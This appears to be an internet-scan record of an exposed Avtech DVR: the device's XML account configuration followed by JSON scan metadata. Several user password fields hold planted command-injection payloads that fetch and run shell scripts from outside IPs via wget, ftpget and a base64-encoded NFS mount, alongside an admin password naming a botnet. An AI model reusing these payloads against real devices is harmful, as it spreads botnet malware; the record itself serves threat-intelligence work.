HTTP/1.1 200 OK
Date: Thu, 07 Nov 2024 05:57:52 GMT
Server: Linux/2.x UPnP/1.0 Avtech/1.0
Connection: close
Last-Modified: Thu, 07 Nov 2024 00:24:03 GMT
Content-Type: text/plain
ETag: 5125-10218-1730939043
Content-Length: 10218
<Account>
<Maxuser Level="40/40">20</Maxuser>
<LocalPassword Level="40/40">0000</LocalPassword>
<OperatorPassword Level="40/40">0000</OperatorPassword>
<AnonymousLogin Level="40/40" Dispatch="account">DISABLE</AnonymousLogin>
<AdvenceUserLevel Level="40/40">OFF</AdvenceUserLevel>
<AccountSecure Level="40/40">0</AccountSecure>
<Permission>
<LastGroup>SUPERVISOR</LastGroup>
<MaxPermDefNum>20</MaxPermDefNum>
<Define>
<Permit1 Type="Channel" Value="0,1,2..16">LiveVideo</Permit1>
<Permit2 Type="Channel" Value="0,1,2..16">LiveAudio</Permit2>
<Permit3 Type="Channel" Value="0,1,2..16">PlaybackVideo</Permit3>
<Permit4 Type="Channel" Value="0,1,2..16">PlaybackAudio</Permit4>
<Permit5 Type="Channel" Value="0,1,2..16">LiveVideoStream</Permit5>
<Permit6 Type="Channel" Value="0,1,2..16">LiveAudioStream</Permit6>
<Permit7 Type="Channel" Value="0,1,2..16">PlaybackVideoStream</Permit7>
<Permit8 Type="Channel" Value="0,1,2..16">PlaybackAudioStream</Permit8>
<Permit9 Type="Channel" Value="0,1,2..16">Backup</Permit9>
<Permit10 Type="Switch" Value="YES/NO">PtzControl</Permit10>
<Permit11 Type="Switch" Value="YES/NO">ConfigSetup</Permit11>
<Permit12 Type="Switch" Value="YES/NO">Reboot</Permit12>
<Permit13 Type="Switch" Value="YES/NO">LogReview</Permit13>
<Permit14 Type="Switch" Value="YES/NO">LogClean</Permit14>
<Permit15 Type="Switch" Value="YES/NO">CleanHDD</Permit15>
<Permit17 Type="Switch" Value="YES/NO">AccountSetup</Permit17>
<Permit18 Type="Switch" Value="YES/NO">PushVideo</Permit18>
<Permit19 Type="Switch" Value="YES/NO">PushStatus</Permit19>
<Permit20 Type="Switch" Value="YES/NO">AlarmOut</Permit20>
</Define>
<MaxGroupNum>40</MaxGroupNum>
<Group1>
<Name>SUPERVISOR</Name>
<Permit1>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit1>
<Permit2>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit2>
<Permit3>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit3>
<Permit4>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit4>
<Permit5>0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit5>
<Permit6>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit6>
<Permit7>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit7>
<Permit8>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit8>
<Permit9>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit9>
<Permit10>YES</Permit10>
<Permit11>YES</Permit11>
<Permit12>YES</Permit12>
<Permit13>YES</Permit13>
<Permit14>YES</Permit14>
<Permit15>YES</Permit15>
<Permit17>YES</Permit17>
<Permit18>YES</Permit18>
<Permit19>YES</Permit19>
<Permit20>YES</Permit20>
</Group1>
<Group2>
<Name>POWER USER</Name>
<Permit1>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit1>
<Permit2>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit2>
<Permit3>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit3>
<Permit4>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit4>
<Permit5>0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit5>
<Permit6>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit6>
<Permit7>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit7>
<Permit8>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit8>
<Permit9>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit9>
<Permit10>YES</Permit10>
<Permit11>NO</Permit11>
<Permit12>NO</Permit12>
<Permit13>NO</Permit13>
<Permit14>NO</Permit14>
<Permit15>NO</Permit15>
<Permit17>NO</Permit17>
<Permit18>NO</Permit18>
<Permit19>NO</Permit19>
<Permit20>YES</Permit20>
</Group2>
<Group3>
<Name>USER</Name>
<Permit1>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit1>
<Permit2>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit2>
<Permit3>-1</Permit3>
<Permit4>-1</Permit4>
<Permit5>0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit5>
<Permit6>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit6>
<Permit7>-1</Permit7>
<Permit8>-1</Permit8>
<Permit9>-1</Permit9>
<Permit10>NO</Permit10>
<Permit11>NO</Permit11>
<Permit12>NO</Permit12>
<Permit13>NO</Permit13>
<Permit14>NO</Permit14>
<Permit15>NO</Permit15>
<Permit17>NO</Permit17>
<Permit18>NO</Permit18>
<Permit19>NO</Permit19>
<Permit20>NO</Permit20>
</Group3>
<Group4>
<Name>GUEST</Name>
<Permit1>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit1>
<Permit2>-1</Permit2>
<Permit3>-1</Permit3>
<Permit4>-1</Permit4>
<Permit5>0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit5>
<Permit6>-1</Permit6>
<Permit7>-1</Permit7>
<Permit8>-1</Permit8>
<Permit9>-1</Permit9>
<Permit10>NO</Permit10>
<Permit11>NO</Permit11>
<Permit12>NO</Permit12>
<Permit13>NO</Permit13>
<Permit14>NO</Permit14>
<Permit15>NO</Permit15>
<Permit17>NO</Permit17>
<Permit18>NO</Permit18>
<Permit19>NO</Permit19>
<Permit20>NO</Permit20>
</Group4>
</Permission>
<CGIPermitDenyFilter>
<R1>
<RelatedPermit>Permit7</RelatedPermit>
<C1>
<CMD>NetworkBk.cgi</CMD>
</C1>
<C2>
<CMD>DownloadCtrl.cgi</CMD>
</C2>
</R1>
<R2>
<RelatedPermit>Permit8</RelatedPermit>
<C1>
<CMD>NetworkBk.cgi</CMD>
</C1>
<C2>
<CMD>DownloadCtrl.cgi</CMD>
</C2>
</R2>
<R3>
<RelatedPermit>Permit10</RelatedPermit>
<C1>
<CMD>Serial.cgi</CMD>
</C1>
</R3>
<R4>
<RelatedPermit>Permit12</RelatedPermit>
<C1>
<CMD>Factory.cgi</CMD>
<P1>reboot</P1>
</C1>
</R4>
<R5>
<RelatedPermit>Permit13</RelatedPermit>
<C1>
<CMD>Log.cgi</CMD>
</C1>
</R5>
<R6>
<RelatedPermit>Permit14</RelatedPermit>
<C1>
<CMD>Log.cgi</CMD>
<P1>clean</P1>
</C1>
</R6>
<R7>
<RelatedPermit>Permit15</RelatedPermit>
<C1>
<CMD>Factory.cgi</CMD>
<P1>clean_hdd_yes</P1>
</C1>
</R7>
<R8>
<RelatedPermit>Permit17</RelatedPermit>
<C1>
<CMD>PwdGrp.cgi</CMD>
</C1>
</R8>
<R9>
<RelatedPermit>Permit18</RelatedPermit>
<C1>
<CMD>Notify.cgi</CMD>
</C1>
<C2>
<CMD>Config.cgi</CMD>
<P1>Notification.Guard</P1>
</C2>
</R9>
<R10>
<RelatedPermit>Permit19</RelatedPermit>
<C1>
<CMD>Notify.cgi</CMD>
<P1>SystemAlert</P1>
</C1>
<C2>
<CMD>Config.cgi</CMD>
<P1>Notification.Log.Push.Action</P1>
</C2>
</R10>
<R11>
<RelatedPermit>Permit11</RelatedPermit>
<C1>
<CMD>Config.cgi</CMD>
</C1>
<C2>
<CMD>DVR.cgi</CMD>
<P1>set</P1>
</C2>
<C3>
<CMD>Firmware.cgi</CMD>
</C3>
</R11>
<R12>
<RelatedPermit>Permit20</RelatedPermit>
<C1>
<CMD>IO.cgi</CMD>
</C1>
</R12>
</CGIPermitDenyFilter>
<User1>
<Username>admin</Username>
<Password>murdoc_botnet</Password>
<Level>SUPERVISOR</Level>
<Lifetime>INFINITE</Lifetime>
<NeddRemove>YES</NeddRemove>
</User1>
<Cloud>
<DefaultSync>YES</DefaultSync>
</Cloud>
<User2>
<Username Level="40/40" Dispatch="account">test</Username>
<Password Level="40/40" Dispatch="account">$(cd /tmp; rm -rf av.sh; /bin/busybox wget http://45.14.224.153/wget.sh -O- | sh)</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">INFINITE</Lifetime>
</User2>
<User5>
<Username Level="40/40" Dispatch="account">0gpnCaSS3ZODCs</Username>
<Password Level="40/40" Dispatch="account">$(echo -ne Y2QgL3RtcDsgbWtkaXIgdGU7IG1vdW50IC1vIGludHIsbm9sb2NrLHRjcCxleGVjIDg5LjE5MC4xNTYuMzA6L3Nydi9uZnMgdGU7IHNoIHRlL2F2LnNo | base64 -d | sh)</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">INFINITE</Lifetime>
</User5>
<User3>
<Username Level="40/40" Dispatch="account">dd7rD</Username>
<Password Level="40/40" Dispatch="account">;$(cd /tmp/;rm -f dav.sh;ftpget 103.124.107.17 dav.sh dav.sh;sh dav.sh);</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User3>
<User4>
<Username Level="40/40" Dispatch="account">f2hj6</Username>
<Password Level="40/40" Dispatch="account">;$(cd /tmp/;rm -f dav.sh;ftpget 103.124.107.17 dav.sh dav.sh;sh dav.sh);</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User4>
</Account>
{
"@category" : "datascan",
"@timestamp" : "2024-11-06T21:57:52.000Z",
"app" : {
"extract" : {
"file" : [
"av.sh",
"dav.sh"
],
"ip" : [
"45.14.224.153",
"103.124.107.17"
],
"url" : [
"http://45.14.224.153/wget.sh"
]
},
"http" : {
"bodymd5" : "2e6c88ff01ba06d04ed782798822baad",
"bodymmh3" : 1091070242,
"header" : [
{
"value" : "Thu, 07 Nov 2024 00:24:03 GMT",
"name" : "Last-Modified"
},
{
"value" : "5125-10218-1730939043",
"name" : "ETag"
}
],
"headermd5" : "55e152df5ae000f4cd5f1e6df1ede339",
"headermmh3" : -1877788544
},
"length" : 10456
},
"asn" : "AS4788",
"city" : "Kuala Lumpur",
"country" : "MY",
"cpe" : "<enterprise field>: cpe",
"cpecount" : "<enterprise field>: cpecount",
"data" : "HTTP/1.1 200 OK\r\nDate: Thu, 07 Nov 2024 05:57:52 GMT\r\nServer: Linux/2.x UPnP/1.0 Avtech/1.0\r\nConnection: close\r\nLast-Modified: Thu, 07 Nov 2024 00:24:03 GMT\r\nContent-Type: text/plain\r\nETag: 5125-10218-1730939043\r\nContent-Length: 10218\r\n\r\n<Account>\n <Maxuser Level=\"40/40\">20</Maxuser>\n <LocalPassword Level=\"40/40\">0000</LocalPassword>\n <OperatorPassword Level=\"40/40\">0000</OperatorPassword>\n <AnonymousLogin Level=\"40/40\" Dispatch=\"account\">DISABLE</AnonymousLogin>\n <AdvenceUserLevel Level=\"40/40\">OFF</AdvenceUserLevel>\n <AccountSecure Level=\"40/40\">0</AccountSecure>\n <Permission>\n <LastGroup>SUPERVISOR</LastGroup>\n <MaxPermDefNum>20</MaxPermDefNum>\n <Define>\n <Permit1 Type=\"Channel\" Value=\"0,1,2..16\">LiveVideo</Permit1>\n <Permit2 Type=\"Channel\" Value=\"0,1,2..16\">LiveAudio</Permit2>\n <Permit3 Type=\"Channel\" Value=\"0,1,2..16\">PlaybackVideo</Permit3>\n <Permit4 Type=\"Channel\" Value=\"0,1,2..16\">PlaybackAudio</Permit4>\n <Permit5 Type=\"Channel\" Value=\"0,1,2..16\">LiveVideoStream</Permit5>\n <Permit6 Type=\"Channel\" Value=\"0,1,2..16\">LiveAudioStream</Permit6>\n <Permit7 Type=\"Channel\" Value=\"0,1,2..16\">PlaybackVideoStream</Permit7>\n <Permit8 Type=\"Channel\" Value=\"0,1,2..16\">PlaybackAudioStream</Permit8>\n <Permit9 Type=\"Channel\" Value=\"0,1,2..16\">Backup</Permit9>\n <Permit10 Type=\"Switch\" Value=\"YES/NO\">PtzControl</Permit10>\n <Permit11 Type=\"Switch\" Value=\"YES/NO\">ConfigSetup</Permit11>\n <Permit12 Type=\"Switch\" Value=\"YES/NO\">Reboot</Permit12>\n <Permit13 Type=\"Switch\" Value=\"YES/NO\">LogReview</Permit13>\n <Permit14 Type=\"Switch\" Value=\"YES/NO\">LogClean</Permit14>\n <Permit15 Type=\"Switch\" Value=\"YES/NO\">CleanHDD</Permit15>\n <Permit17 Type=\"Switch\" Value=\"YES/NO\">AccountSetup</Permit17>\n <Permit18 Type=\"Switch\" Value=\"YES/NO\">PushVideo</Permit18>\n <Permit19 Type=\"Switch\" Value=\"YES/NO\">PushStatus</Permit19>\n <Permit20 Type=\"Switch\" Value=\"YES/NO\">AlarmOut</Permit20>\n </Define>\n <MaxGroupNum>40</MaxGroupNum>\n <Group1>\n <Name>SUPERVISOR</Name>\n <Permit1>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit1>\n <Permit2>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit2>\n <Permit3>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit3>\n <Permit4>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit4>\n <Permit5>0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit5>\n <Permit6>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit6>\n <Permit7>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit7>\n <Permit8>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit8>\n <Permit9>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit9>\n <Permit10>YES</Permit10>\n <Permit11>YES</Permit11>\n <Permit12>YES</Permit12>\n <Permit13>YES</Permit13>\n <Permit14>YES</Permit14>\n <Permit15>YES</Permit15>\n <Permit17>YES</Permit17>\n <Permit18>YES</Permit18>\n <Permit19>YES</Permit19>\n <Permit20>YES</Permit20>\n </Group1>\n <Group2>\n <Name>POWER USER</Name>\n <Permit1>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit1>\n <Permit2>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit2>\n <Permit3>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit3>\n <Permit4>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit4>\n <Permit5>0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit5>\n <Permit6>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit6>\n <Permit7>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit7>\n <Permit8>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit8>\n <Permit9>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit9>\n <Permit10>YES</Permit10>\n <Permit11>NO</Permit11>\n <Permit12>NO</Permit12>\n <Permit13>NO</Permit13>\n <Permit14>NO</Permit14>\n <Permit15>NO</Permit15>\n <Permit17>NO</Permit17>\n <Permit18>NO</Permit18>\n <Permit19>NO</Permit19>\n <Permit20>YES</Permit20>\n </Group2>\n <Group3>\n <Name>USER</Name>\n <Permit1>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit1>\n <Permit2>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit2>\n <Permit3>-1</Permit3>\n <Permit4>-1</Permit4>\n <Permit5>0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit5>\n <Permit6>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit6>\n <Permit7>-1</Permit7>\n <Permit8>-1</Permit8>\n <Permit9>-1</Permit9>\n <Permit10>NO</Permit10>\n <Permit11>NO</Permit11>\n <Permit12>NO</Permit12>\n <Permit13>NO</Permit13>\n <Permit14>NO</Permit14>\n <Permit15>NO</Permit15>\n <Permit17>NO</Permit17>\n <Permit18>NO</Permit18>\n <Permit19>NO</Permit19>\n <Permit20>NO</Permit20>\n </Group3>\n <Group4>\n <Name>GUEST</Name>\n <Permit1>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit1>\n <Permit2>-1</Permit2>\n <Permit3>-1</Permit3>\n <Permit4>-1</Permit4>\n <Permit5>0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16</Permit5>\n <Permit6>-1</Permit6>\n <Permit7>-1</Permit7>\n <Permit8>-1</Permit8>\n <Permit9>-1</Permit9>\n <Permit10>NO</Permit10>\n <Permit11>NO</Permit11>\n <Permit12>NO</Permit12>\n <Permit13>NO</Permit13>\n <Permit14>NO</Permit14>\n <Permit15>NO</Permit15>\n <Permit17>NO</Permit17>\n <Permit18>NO</Permit18>\n <Permit19>NO</Permit19>\n <Permit20>NO</Permit20>\n </Group4>\n </Permission>\n <CGIPermitDenyFilter>\n <R1>\n <RelatedPermit>Permit7</RelatedPermit>\n <C1>\n <CMD>NetworkBk.cgi</CMD>\n </C1>\n <C2>\n <CMD>DownloadCtrl.cgi</CMD>\n </C2>\n </R1>\n <R2>\n <RelatedPermit>Permit8</RelatedPermit>\n <C1>\n <CMD>NetworkBk.cgi</CMD>\n </C1>\n <C2>\n <CMD>DownloadCtrl.cgi</CMD>\n </C2>\n </R2>\n <R3>\n <RelatedPermit>Permit10</RelatedPermit>\n <C1>\n <CMD>Serial.cgi</CMD>\n </C1>\n </R3>\n <R4>\n <RelatedPermit>Permit12</RelatedPermit>\n <C1>\n <CMD>Factory.cgi</CMD>\n <P1>reboot</P1>\n </C1>\n </R4>\n <R5>\n <RelatedPermit>Permit13</RelatedPermit>\n <C1>\n <CMD>Log.cgi</CMD>\n </C1>\n </R5>\n <R6>\n <RelatedPermit>Permit14</RelatedPermit>\n <C1>\n <CMD>Log.cgi</CMD>\n <P1>clean</P1>\n </C1>\n </R6>\n <R7>\n <RelatedPermit>Permit15</RelatedPermit>\n <C1>\n <CMD>Factory.cgi</CMD>\n <P1>clean_hdd_yes</P1>\n </C1>\n </R7>\n <R8>\n <RelatedPermit>Permit17</RelatedPermit>\n <C1>\n <CMD>PwdGrp.cgi</CMD>\n </C1>\n </R8>\n <R9>\n <RelatedPermit>Permit18</RelatedPermit>\n <C1>\n <CMD>Notify.cgi</CMD>\n </C1>\n <C2>\n <CMD>Config.cgi</CMD>\n <P1>Notification.Guard</P1>\n </C2>\n </R9>\n <R10>\n <RelatedPermit>Permit19</RelatedPermit>\n <C1>\n <CMD>Notify.cgi</CMD>\n <P1>SystemAlert</P1>\n </C1>\n <C2>\n <CMD>Config.cgi</CMD>\n <P1>Notification.Log.Push.Action</P1>\n </C2>\n </R10>\n <R11>\n <RelatedPermit>Permit11</RelatedPermit>\n <C1>\n <CMD>Config.cgi</CMD>\n </C1>\n <C2>\n <CMD>DVR.cgi</CMD>\n <P1>set</P1>\n </C2>\n <C3>\n <CMD>Firmware.cgi</CMD>\n </C3>\n </R11>\n <R12>\n <RelatedPermit>Permit20</RelatedPermit>\n <C1>\n <CMD>IO.cgi</CMD>\n </C1>\n </R12>\n </CGIPermitDenyFilter>\n <User1>\n <Username>admin</Username>\n <Password>murdoc_botnet</Password>\n <Level>SUPERVISOR</Level>\n <Lifetime>INFINITE</Lifetime>\n <NeddRemove>YES</NeddRemove>\n </User1>\n <Cloud>\n <DefaultSync>YES</DefaultSync>\n </Cloud>\n <User2>\n <Username Level=\"40/40\" Dispatch=\"account\">test</Username>\n <Password Level=\"40/40\" Dispatch=\"account\">$(cd /tmp; rm -rf av.sh; /bin/busybox wget http://45.14.224.153/wget.sh -O- | sh)</Password>\n <Level Level=\"40/40\" Dispatch=\"account\">SUPERVISOR</Level>\n <Lifetime Level=\"40/40\" Dispatch=\"account\">INFINITE</Lifetime>\n </User2>\n <User5>\n <Username Level=\"40/40\" Dispatch=\"account\">0gpnCaSS3ZODCs</Username>\n <Password Level=\"40/40\" Dispatch=\"account\">$(echo -ne Y2QgL3RtcDsgbWtkaXIgdGU7IG1vdW50IC1vIGludHIsbm9sb2NrLHRjcCxleGVjIDg5LjE5MC4xNTYuMzA6L3Nydi9uZnMgdGU7IHNoIHRlL2F2LnNo | base64 -d | sh)</Password>\n <Level Level=\"40/40\" Dispatch=\"account\">SUPERVISOR</Level>\n <Lifetime Level=\"40/40\" Dispatch=\"account\">INFINITE</Lifetime>\n </User5>\n <User3>\n <Username Level=\"40/40\" Dispatch=\"account\">dd7rD</Username>\n <Password Level=\"40/40\" Dispatch=\"account\">;$(cd /tmp/;rm -f dav.sh;ftpget 103.124.107.17 dav.sh dav.sh;sh dav.sh);</Password>\n <Level Level=\"40/40\" Dispatch=\"account\">SUPERVISOR</Level>\n <Lifetime Level=\"40/40\" Dispatch=\"account\">5 MIN</Lifetime>\n </User3>\n <User4>\n <Username Level=\"40/40\" Dispatch=\"account\">f2hj6</Username>\n <Password Level=\"40/40\" Dispatch=\"account\">;$(cd /tmp/;rm -f dav.sh;ftpget 103.124.107.17 dav.sh dav.sh;sh dav.sh);</Password>\n <Level Level=\"40/40\" Dispatch=\"account\">SUPERVISOR</Level>\n <Lifetime Level=\"40/40\" Dispatch=\"account\">5 MIN</Lifetime>\n </User4>\n</Account>\n",
"datamd5" : "57039e9d9f5b32cc87dc2f7387d9b7e9",
"datammh3" : -1051983284,
"device" : {
"class" : "<enterprise field>: device.class"
},
"geolocus" : {
"asn" : "AS4788",
"continent" : "AS",
"continentname" : "Asia",
"country" : "MY",
"countryname" : "Malaysia",
"domain" : [
"tm.com.my"
],
"isineu" : "false",
"latitude" : "4.210484",
"location" : "4.210484,101.975766",
"longitude" : "101.975766",
"netname" : "ADSL-STREAMYX",
"organization" : "Telekom Malaysia Berhad",
"subnet" : "115.135.0.0/16"
},
"ip" : "115.135.192.196",
"ipv6" : "false",
"latitude" : "3.1412",
"location" : "3.1412,101.6850",
"longitude" : "101.6850",
"node" : {
"country" : "<enterprise field>: node.country",
"groupid" : "<enterprise field>: node.groupid",
"id" : "<enterprise field>: node.id",
"physicalcountry" : "<enterprise field>: node.physicalcountry"
},
"organization" : "TM TECHNOLOGY SERVICES SDN. BHD.",
"os" : "Linux",
"osvendor" : "Linux",
"osversion" : "2",
"port" : 548,
"protocol" : "http",
"protocolversion" : "1.1",
"reason" : "OK",
"seen_date" : "2024-11-06",
"source" : "datascan",
"status" : 200,
"subnet" : "115.132.0.0/14",
"tag" : "<enterprise field>: tag",
"tls" : "false",
"transport" : "tcp",
"url" : "/"
}
